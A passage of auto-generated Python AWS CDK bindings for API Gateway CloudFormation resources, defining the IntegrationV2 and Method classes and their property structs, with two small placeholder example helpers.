:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-responseparameters
"""
return self._values.get('response_parameters')
@property
def response_templates(self) -> typing.Any:
"""``AWS::ApiGatewayV2::IntegrationResponse.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-responsetemplates
"""
return self._values.get('response_templates')
@property
def template_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::IntegrationResponse.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-templateselectionexpression
"""
return self._values.get('template_selection_expression')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnIntegrationResponseV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
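# A sketch showing how omitted optional keys behave on this props struct:
# because the accessors fall through to ``self._values.get(...)``, reading an
# unsupplied key returns ``None``. All ids below are placeholders.
def _integration_response_v2_props_defaults() -> None:
    props = CfnIntegrationResponseV2Props(
        api_id="api-id-placeholder",
        integration_id="integration-id-placeholder",
        integration_response_key="$default")
    assert props.integration_response_key == "$default"
    # ``content_handling_strategy`` was never stored, so the lookup yields None.
    assert props.content_handling_strategy is None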
@jsii.implements(aws_cdk.core.IInspectable)
class CfnIntegrationV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnIntegrationV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Integration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Integration
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, integration_type: str, connection_type: typing.Optional[str]=None, content_handling_strategy: typing.Optional[str]=None, credentials_arn: typing.Optional[str]=None, description: typing.Optional[str]=None, integration_method: typing.Optional[str]=None, integration_uri: typing.Optional[str]=None, passthrough_behavior: typing.Optional[str]=None, request_parameters: typing.Any=None, request_templates: typing.Any=None, template_selection_expression: typing.Optional[str]=None, timeout_in_millis: typing.Optional[jsii.Number]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Integration``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param api_id: ``AWS::ApiGatewayV2::Integration.ApiId``.
:param integration_type: ``AWS::ApiGatewayV2::Integration.IntegrationType``.
:param connection_type: ``AWS::ApiGatewayV2::Integration.ConnectionType``.
:param content_handling_strategy: ``AWS::ApiGatewayV2::Integration.ContentHandlingStrategy``.
:param credentials_arn: ``AWS::ApiGatewayV2::Integration.CredentialsArn``.
:param description: ``AWS::ApiGatewayV2::Integration.Description``.
:param integration_method: ``AWS::ApiGatewayV2::Integration.IntegrationMethod``.
:param integration_uri: ``AWS::ApiGatewayV2::Integration.IntegrationUri``.
:param passthrough_behavior: ``AWS::ApiGatewayV2::Integration.PassthroughBehavior``.
:param request_parameters: ``AWS::ApiGatewayV2::Integration.RequestParameters``.
:param request_templates: ``AWS::ApiGatewayV2::Integration.RequestTemplates``.
:param template_selection_expression: ``AWS::ApiGatewayV2::Integration.TemplateSelectionExpression``.
:param timeout_in_millis: ``AWS::ApiGatewayV2::Integration.TimeoutInMillis``.
"""
props = CfnIntegrationV2Props(api_id=api_id, integration_type=integration_type, connection_type=connection_type, content_handling_strategy=content_handling_strategy, credentials_arn=credentials_arn, description=description, integration_method=integration_method, integration_uri=integration_uri, passthrough_behavior=passthrough_behavior, request_parameters=request_parameters, request_templates=request_templates, template_selection_expression=template_selection_expression, timeout_in_millis=timeout_in_millis)
jsii.create(CfnIntegrationV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Integration.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="integrationType")
def integration_type(self) -> str:
"""``AWS::ApiGatewayV2::Integration.IntegrationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationtype
"""
return jsii.get(self, "integrationType")
@integration_type.setter
def integration_type(self, value: str):
return jsii.set(self, "integrationType", value)
@property
@jsii.member(jsii_name="requestParameters")
def request_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Integration.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-requestparameters
"""
return jsii.get(self, "requestParameters")
@request_parameters.setter
def request_parameters(self, value: typing.Any):
return jsii.set(self, "requestParameters", value)
@property
@jsii.member(jsii_name="requestTemplates")
def request_templates(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Integration.RequestTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-requesttemplates
"""
return jsii.get(self, "requestTemplates")
@request_templates.setter
def request_templates(self, value: typing.Any):
return jsii.set(self, "requestTemplates", value)
@property
@jsii.member(jsii_name="connectionType")
def connection_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.ConnectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-connectiontype
"""
return jsii.get(self, "connectionType")
@connection_type.setter
def connection_type(self, value: typing.Optional[str]):
return jsii.set(self, "connectionType", value)
@property
@jsii.member(jsii_name="contentHandlingStrategy")
def content_handling_strategy(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.ContentHandlingStrategy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-contenthandlingstrategy
"""
return jsii.get(self, "contentHandlingStrategy")
@content_handling_strategy.setter
def content_handling_strategy(self, value: typing.Optional[str]):
return jsii.set(self, "contentHandlingStrategy", value)
@property
@jsii.member(jsii_name="credentialsArn")
def credentials_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.CredentialsArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-credentialsarn
"""
return jsii.get(self, "credentialsArn")
@credentials_arn.setter
def credentials_arn(self, value: typing.Optional[str]):
return jsii.set(self, "credentialsArn", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="integrationMethod")
def integration_method(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.IntegrationMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationmethod
"""
return jsii.get(self, "integrationMethod")
@integration_method.setter
def integration_method(self, value: typing.Optional[str]):
return jsii.set(self, "integrationMethod", value)
@property
@jsii.member(jsii_name="integrationUri")
def integration_uri(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.IntegrationUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationuri
"""
return jsii.get(self, "integrationUri")
@integration_uri.setter
def integration_uri(self, value: typing.Optional[str]):
return jsii.set(self, "integrationUri", value)
@property
@jsii.member(jsii_name="passthroughBehavior")
def passthrough_behavior(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.PassthroughBehavior``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-passthroughbehavior
"""
return jsii.get(self, "passthroughBehavior")
@passthrough_behavior.setter
def passthrough_behavior(self, value: typing.Optional[str]):
return jsii.set(self, "passthroughBehavior", value)
@property
@jsii.member(jsii_name="templateSelectionExpression")
def template_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-templateselectionexpression
"""
return jsii.get(self, "templateSelectionExpression")
@template_selection_expression.setter
def template_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "templateSelectionExpression", value)
@property
@jsii.member(jsii_name="timeoutInMillis")
def timeout_in_millis(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGatewayV2::Integration.TimeoutInMillis``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-timeoutinmillis
"""
return jsii.get(self, "timeoutInMillis")
@timeout_in_millis.setter
def timeout_in_millis(self, value: typing.Optional[jsii.Number]):
return jsii.set(self, "timeoutInMillis", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnIntegrationV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'integration_type': 'integrationType', 'connection_type': 'connectionType', 'content_handling_strategy': 'contentHandlingStrategy', 'credentials_arn': 'credentialsArn', 'description': 'description', 'integration_method': 'integrationMethod', 'integration_uri': 'integrationUri', 'passthrough_behavior': 'passthroughBehavior', 'request_parameters': 'requestParameters', 'request_templates': 'requestTemplates', 'template_selection_expression': 'templateSelectionExpression', 'timeout_in_millis': 'timeoutInMillis'})
class CfnIntegrationV2Props():
def __init__(self, *, api_id: str, integration_type: str, connection_type: typing.Optional[str]=None, content_handling_strategy: typing.Optional[str]=None, credentials_arn: typing.Optional[str]=None, description: typing.Optional[str]=None, integration_method: typing.Optional[str]=None, integration_uri: typing.Optional[str]=None, passthrough_behavior: typing.Optional[str]=None, request_parameters: typing.Any=None, request_templates: typing.Any=None, template_selection_expression: typing.Optional[str]=None, timeout_in_millis: typing.Optional[jsii.Number]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Integration``.
:param api_id: ``AWS::ApiGatewayV2::Integration.ApiId``.
:param integration_type: ``AWS::ApiGatewayV2::Integration.IntegrationType``.
:param connection_type: ``AWS::ApiGatewayV2::Integration.ConnectionType``.
:param content_handling_strategy: ``AWS::ApiGatewayV2::Integration.ContentHandlingStrategy``.
:param credentials_arn: ``AWS::ApiGatewayV2::Integration.CredentialsArn``.
:param description: ``AWS::ApiGatewayV2::Integration.Description``.
:param integration_method: ``AWS::ApiGatewayV2::Integration.IntegrationMethod``.
:param integration_uri: ``AWS::ApiGatewayV2::Integration.IntegrationUri``.
:param passthrough_behavior: ``AWS::ApiGatewayV2::Integration.PassthroughBehavior``.
:param request_parameters: ``AWS::ApiGatewayV2::Integration.RequestParameters``.
:param request_templates: ``AWS::ApiGatewayV2::Integration.RequestTemplates``.
:param template_selection_expression: ``AWS::ApiGatewayV2::Integration.TemplateSelectionExpression``.
:param timeout_in_millis: ``AWS::ApiGatewayV2::Integration.TimeoutInMillis``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html
"""
self._values = {
'api_id': api_id,
'integration_type': integration_type,
}
if connection_type is not None: self._values["connection_type"] = connection_type
if content_handling_strategy is not None: self._values["content_handling_strategy"] = content_handling_strategy
if credentials_arn is not None: self._values["credentials_arn"] = credentials_arn
if description is not None: self._values["description"] = description
if integration_method is not None: self._values["integration_method"] = integration_method
if integration_uri is not None: self._values["integration_uri"] = integration_uri
if passthrough_behavior is not None: self._values["passthrough_behavior"] = passthrough_behavior
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_templates is not None: self._values["request_templates"] = request_templates
if template_selection_expression is not None: self._values["template_selection_expression"] = template_selection_expression
if timeout_in_millis is not None: self._values["timeout_in_millis"] = timeout_in_millis
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Integration.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-apiid
"""
return self._values.get('api_id')
@property
def integration_type(self) -> str:
"""``AWS::ApiGatewayV2::Integration.IntegrationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationtype
"""
return self._values.get('integration_type')
@property
def connection_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.ConnectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-connectiontype
"""
return self._values.get('connection_type')
@property
def content_handling_strategy(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.ContentHandlingStrategy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-contenthandlingstrategy
"""
return self._values.get('content_handling_strategy')
@property
def credentials_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.CredentialsArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-credentialsarn
"""
return self._values.get('credentials_arn')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-description
"""
return self._values.get('description')
@property
def integration_method(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.IntegrationMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationmethod
"""
return self._values.get('integration_method')
@property
def integration_uri(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.IntegrationUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationuri
"""
return self._values.get('integration_uri')
@property
def passthrough_behavior(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.PassthroughBehavior``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-passthroughbehavior
"""
return self._values.get('passthrough_behavior')
@property
def request_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Integration.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-requestparameters
"""
return self._values.get('request_parameters')
@property
def request_templates(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Integration.RequestTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-requesttemplates
"""
return self._values.get('request_templates')
@property
def template_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-templateselectionexpression
"""
return self._values.get('template_selection_expression')
@property
def timeout_in_millis(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGatewayV2::Integration.TimeoutInMillis``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-timeoutinmillis
"""
return self._values.get('timeout_in_millis')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnIntegrationV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
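# A sketch of building the props struct directly. The ``name_mapping`` in the
# decorator above translates each snake_case keyword (e.g. ``integration_type``)
# to its camelCase jsii name (``integrationType``) when the struct crosses the
# jsii boundary. The URI and id below are placeholders.
def _example_integration_v2_props() -> "CfnIntegrationV2Props":
    return CfnIntegrationV2Props(
        api_id="api-id-placeholder",
        integration_type="HTTP_PROXY",
        integration_method="ANY",
        integration_uri="https://example.com/{proxy}",
        passthrough_behavior="WHEN_NO_MATCH")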
@jsii.implements(aws_cdk.core.IInspectable)
class CfnMethod(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnMethod"):
"""A CloudFormation ``AWS::ApiGateway::Method``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Method
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, http_method: str, resource_id: str, rest_api_id: str, api_key_required: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, authorization_scopes: typing.Optional[typing.List[str]]=None, authorization_type: typing.Optional[str]=None, authorizer_id: typing.Optional[str]=None, integration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["IntegrationProperty"]]]=None, method_responses: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodResponseProperty"]]]]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, request_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]=None, request_validator_id: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::Method``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param http_method: ``AWS::ApiGateway::Method.HttpMethod``.
:param resource_id: ``AWS::ApiGateway::Method.ResourceId``.
:param rest_api_id: ``AWS::ApiGateway::Method.RestApiId``.
:param api_key_required: ``AWS::ApiGateway::Method.ApiKeyRequired``.
:param authorization_scopes: ``AWS::ApiGateway::Method.AuthorizationScopes``.
:param authorization_type: ``AWS::ApiGateway::Method.AuthorizationType``.
:param authorizer_id: ``AWS::ApiGateway::Method.AuthorizerId``.
:param integration: ``AWS::ApiGateway::Method.Integration``.
:param method_responses: ``AWS::ApiGateway::Method.MethodResponses``.
:param operation_name: ``AWS::ApiGateway::Method.OperationName``.
:param request_models: ``AWS::ApiGateway::Method.RequestModels``.
:param request_parameters: ``AWS::ApiGateway::Method.RequestParameters``.
:param request_validator_id: ``AWS::ApiGateway::Method.RequestValidatorId``.
"""
props = CfnMethodProps(http_method=http_method, resource_id=resource_id, rest_api_id=rest_api_id, api_key_required=api_key_required, authorization_scopes=authorization_scopes, authorization_type=authorization_type, authorizer_id=authorizer_id, integration=integration, method_responses=method_responses, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, request_validator_id=request_validator_id)
jsii.create(CfnMethod, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="httpMethod")
def http_method(self) -> str:
"""``AWS::ApiGateway::Method.HttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-httpmethod
"""
return jsii.get(self, "httpMethod")
@http_method.setter
def http_method(self, value: str):
return jsii.set(self, "httpMethod", value)
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""``AWS::ApiGateway::Method.ResourceId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-resourceid
"""
return jsii.get(self, "resourceId")
@resource_id.setter
def resource_id(self, value: str):
return jsii.set(self, "resourceId", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Method.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="apiKeyRequired")
def api_key_required(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Method.ApiKeyRequired``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-apikeyrequired
"""
return jsii.get(self, "apiKeyRequired")
@api_key_required.setter
def api_key_required(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "apiKeyRequired", value)
@property
@jsii.member(jsii_name="authorizationScopes")
def authorization_scopes(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::Method.AuthorizationScopes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizationscopes
"""
return jsii.get(self, "authorizationScopes")
@authorization_scopes.setter
def authorization_scopes(self, value: typing.Optional[typing.List[str]]):
return jsii.set(self, "authorizationScopes", value)
@property
@jsii.member(jsii_name="authorizationType")
def authorization_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.AuthorizationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizationtype
"""
return jsii.get(self, "authorizationType")
@authorization_type.setter
def authorization_type(self, value: typing.Optional[str]):
return jsii.set(self, "authorizationType", value)
@property
@jsii.member(jsii_name="authorizerId")
def authorizer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.AuthorizerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizerid
"""
return jsii.get(self, "authorizerId")
@authorizer_id.setter
def authorizer_id(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerId", value)
@property
@jsii.member(jsii_name="integration")
def integration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["IntegrationProperty"]]]:
"""``AWS::ApiGateway::Method.Integration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-integration
"""
return jsii.get(self, "integration")
@integration.setter
def integration(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["IntegrationProperty"]]]):
return jsii.set(self, "integration", value)
@property
@jsii.member(jsii_name="methodResponses")
def method_responses(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodResponseProperty"]]]]]:
"""``AWS::ApiGateway::Method.MethodResponses``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-methodresponses
"""
return jsii.get(self, "methodResponses")
@method_responses.setter
def method_responses(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "MethodResponseProperty"]]]]]):
return jsii.set(self, "methodResponses", value)
@property
@jsii.member(jsii_name="operationName")
def operation_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.OperationName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-operationname
"""
return jsii.get(self, "operationName")
@operation_name.setter
def operation_name(self, value: typing.Optional[str]):
return jsii.set(self, "operationName", value)
@property
@jsii.member(jsii_name="requestModels")
def request_models(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::Method.RequestModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestmodels
"""
return jsii.get(self, "requestModels")
@request_models.setter
def request_models(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "requestModels", value)
@property
@jsii.member(jsii_name="requestParameters")
def request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]:
"""``AWS::ApiGateway::Method.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestparameters
"""
return jsii.get(self, "requestParameters")
@request_parameters.setter
def request_parameters(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]):
return jsii.set(self, "requestParameters", value)
@property
@jsii.member(jsii_name="requestValidatorId")
def request_validator_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.RequestValidatorId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestvalidatorid
"""
return jsii.get(self, "requestValidatorId")
@request_validator_id.setter
def request_validator_id(self, value: typing.Optional[str]):
return jsii.set(self, "requestValidatorId", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnMethod.IntegrationProperty", jsii_struct_bases=[], name_mapping={'cache_key_parameters': 'cacheKeyParameters', 'cache_namespace': 'cacheNamespace', 'connection_id': 'connectionId', 'connection_type': 'connectionType', 'content_handling': 'contentHandling', 'credentials': 'credentials', 'integration_http_method': 'integrationHttpMethod', 'integration_responses': 'integrationResponses', 'passthrough_behavior': 'passthroughBehavior', 'request_parameters': 'requestParameters', 'request_templates': 'requestTemplates', 'timeout_in_millis': 'timeoutInMillis', 'type': 'type', 'uri': 'uri'})
class IntegrationProperty():
